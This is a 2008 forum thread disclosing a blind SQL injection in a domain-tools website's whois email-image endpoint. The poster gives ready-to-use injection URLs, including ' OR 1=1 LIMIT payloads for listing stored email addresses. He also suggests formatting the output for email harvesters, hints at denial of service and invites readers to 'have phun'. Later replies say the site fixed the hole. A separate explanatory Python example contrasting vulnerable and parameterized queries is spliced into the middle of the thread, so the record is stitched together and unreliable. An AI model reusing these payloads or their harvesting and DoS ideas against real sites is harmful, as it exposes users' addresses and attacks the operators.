Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
domaintools.com SQL Injection
Posted by: Shocker
Date: June 01, 2008 11:49AM

domaintools.com, one of the biggest websites with tools for domains such as domain suggestions, whois, blabla, is vulnerable to SQL injection in the whois module

In the whois page, emails are displayed as images, dynamically generated, something like:
Image link:
http://source.domaintools.com/email.pgif?md5=7133c94ef8eb1e9984b110651d2cd92e&face=Atomic_Clock_Radio&size=7&color=000000&bgcolor=FFFFFF&format[]=transparent&face=Trebuchet&size=9&color=0000FF&bgcolor=FFFFFF&format[]=underline&format[]=transparent

The md5 GET parameter is used directly and unfiltered in the SQL query, poc:
hxxp://source.domaintools.com/email.pgif?md5=' or md5='7133c94ef8eb1e9984b110651d2cd92e
(7133c94ef8eb1e9984b110651d2cd92e = md5 hash for shocker@freakz.ro)

Unfortunately this is a blind sql injection, no errors, no nothing, it may be used to disclose whatever they have in their db, but we got no table names, field names or column count for the initial select, sucks.
The field that holds the email in plaintext is email, poc:
hxxp://source.domaintools.com/email.pgif?md5=' or email='shocker@freakz.ro
Doing this will result in a very delayed page load because of the huge size of their database and the fact they don't have any index assigned for the email field, just for the md5 field.

Even a full email listing can be done
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 0,1 --%20
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 1,1 --%20
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 2,1 --%20
hxxp://source.domaintools.com/email.pgif?md5=' OR 1=1 LIMIT 3,1 --%20
...
use the other GET parameters to output the text with some monospaced font to easily create an OCR software (for email harvesters)

Maybe even a denial of service if we make some simultaneous requests with OR 1=1, or email='blabla', w/e, have phun with it faster if you really want to take advantage of it

hackpedia.info | Shocker's ShockingSoft

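The defect Shocker describes is a classic string-spliced lookup: the `md5=` GET value goes straight into the `WHERE` clause, so a stray quote turns the lookup into whatever expression the caller supplies. The following is an added example, not code from domaintools.com or from this thread; it assumes a hypothetical table `emails(md5, email)` with only `md5` indexed (as the post describes), uses an in-memory SQLite database, and fills it with constructed sample addresses. It puts the vulnerable lookup beside a hardened one that allow-lists the parameter shape (32 hex digits) and binds the value instead of concatenating it.

```python
import hashlib
import re
import sqlite3

# Constructed sample addresses (not real data) standing in for the whois
# email table; the real schema at domaintools.com is not known.
SAMPLE_EMAILS = [
    "alice@example.invalid",
    "bob@example.invalid",
    "carol@example.invalid",
]


def md5_hex(email: str) -> str:
    """Hex MD5 of an address, the key the email.pgif endpoint takes as ?md5=."""
    return hashlib.md5(email.encode("utf-8")).hexdigest()


def build_db() -> sqlite3.Connection:
    """Hypothetical in-memory table: md5 is the indexed key, email is plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE emails (md5 TEXT PRIMARY KEY, email TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO emails (md5, email) VALUES (?, ?)",
        [(md5_hex(e), e) for e in SAMPLE_EMAILS],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, md5_param: str) -> list:
    """The defect the post describes: the GET value is spliced into the SQL text.

    A parameter such as "' OR 1=1 --" closes the literal, adds a tautology and
    comments out the trailing quote, so every row comes back.
    """
    sql = "SELECT email FROM emails WHERE md5='" + md5_param + "'"
    return [row[0] for row in conn.execute(sql)]


# Allow-list for the parameter: exactly 32 hex digits, nothing else.
MD5_HEX_RE = re.compile(r"[0-9a-fA-F]{32}")


def is_valid_md5(param: str) -> bool:
    """True only for a well-formed hex MD5 digest."""
    return MD5_HEX_RE.fullmatch(param) is not None


def lookup_hardened(conn: sqlite3.Connection, md5_param: str) -> list:
    """Hardened form: reject malformed input, then bind the value as a parameter.

    Binding alone already prevents the value from altering the statement; the
    shape check is defence in depth and also guarantees the query only ever
    hits the indexed md5 column, never a slow full scan.
    """
    if not is_valid_md5(md5_param):
        return []
    rows = conn.execute(
        "SELECT email FROM emails WHERE md5=?", (md5_param.lower(),)
    ).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    tautology = "' OR 1=1 --"
    print("vulnerable, tautology:", lookup_vulnerable(db, tautology))
    print("hardened,   tautology:", lookup_hardened(db, tautology))
    print("hardened,   real hash:", lookup_hardened(db, md5_hex("bob@example.invalid")))
```

Running the block shows the vulnerable lookup returning the whole table for the tautology while the hardened one returns nothing for it and still resolves a genuine digest. The parameterized query is the fix that matters; the regex is cheap insurance that also keeps the endpoint from being driven into the unindexed `email` column that the post notes makes page loads crawl.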
Re: domaintools.com SQL Injection
Posted by: Shocker
Date: June 02, 2008 05:44PM

mhm, fixed

hackpedia.info | Shocker's ShockingSoft



Edited 1 time(s). Last edit at 06/02/2008 05:45PM by Shocker.

Re: domaintools.com SQL Injection
Posted by: rsnake
Date: June 09, 2008 10:02AM

That was quick!

- RSnake
Gotta love it. http://ha.ckers.org
